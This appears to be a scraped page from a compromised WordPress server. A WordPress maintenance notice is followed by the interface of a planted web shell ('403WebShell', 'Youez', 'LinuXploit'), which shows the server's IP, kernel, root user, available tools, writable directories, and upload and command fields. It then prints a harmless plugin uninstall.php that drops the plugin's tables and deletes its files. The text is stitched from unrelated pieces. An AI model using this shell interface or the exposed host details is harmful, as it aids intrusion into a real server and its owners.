WordPress

Briefly unavailable for scheduled maintenance.
Check back in a some hours.
403WebShell
403Webshell
Server IP : 38.242.244.58  /  Your IP : 216.73.217.174
Web Server : Apache/2.4.41 (Ubuntu)
System : Linux vmi1486879.contaboserver.net 5.4.0-166-generic #183-Ubuntu SMP Mon Oct 2 11:28:33 UTC 2023 x86_64
User : root ( 0)
PHP Version : 7.4.3-4ubuntu2.19
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/html/tribe_david/wp-content/plugins/reviews-feed/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/tribe_david/wp-content/plugins/reviews-feed/uninstall.php
<?php

if (!defined('ABSPATH')) {
	exit; // Exit if accessed directly
}
if (! defined('WP_UNINSTALL_PLUGIN')) {
	exit();
}


$settings = get_option('sbr_settings', array());

$preserve_settings = ! empty($settings['preserve_settings']) && $settings['preserve_settings'];

if (! $preserve_settings) {
	// wp_options
	$wp_options_keys = array(
		'sbr_apikeys',
		'sbr_apikeys_limit',
		'sbr_business_cache',
		'sbr_db_version',
		'sbr_settings',
		'sbr_statuses',
	);
	foreach ($wp_options_keys as $key) {
		delete_option($key);
	}

	// user roles
	global $wp_roles;
	$wp_roles->remove_cap('administrator', 'manage_reviews_feed_options');

	// cron events
	$cron_keys = array(
		'sbr_cron_additional_batch',
		'sbr_feed_update',
	);
	foreach ($cron_keys as $key) {
		wp_clear_scheduled_hook($key);
	}

	// custom tables
	global $wpdb;

	$table_keys = array(
		'sbr_feeds',
		'sbr_feed_caches',
		'sbr_feed_locator',
		'sbr_posts',
		'sbr_reviews_posts',
		'sbr_sources',
	);
	foreach ($table_keys as $key) {
		$table_name = $wpdb->prefix . $key;
		// phpcs:ignore WordPress.DB.PreparedSQL.InterpolatedNotPrepared -- Table name is safely constructed from $wpdb->prefix
		$wpdb->query("DROP TABLE IF EXISTS $table_name");
	}

	// custom image files
	$upload = wp_upload_dir();
	$folder = trailingslashit($upload['basedir']) . trailingslashit('sbr-feed-images');
	$image_files = glob($folder . '*'); // get all file names
	foreach ($image_files as $file) { // iterate files
		if (is_file($file)) {
			unlink($file);
		}
	}

	global $wp_filesystem;
	$wp_filesystem->delete($folder, true);
}

Youez - 2016 - github.com/yon3zu
LinuXploit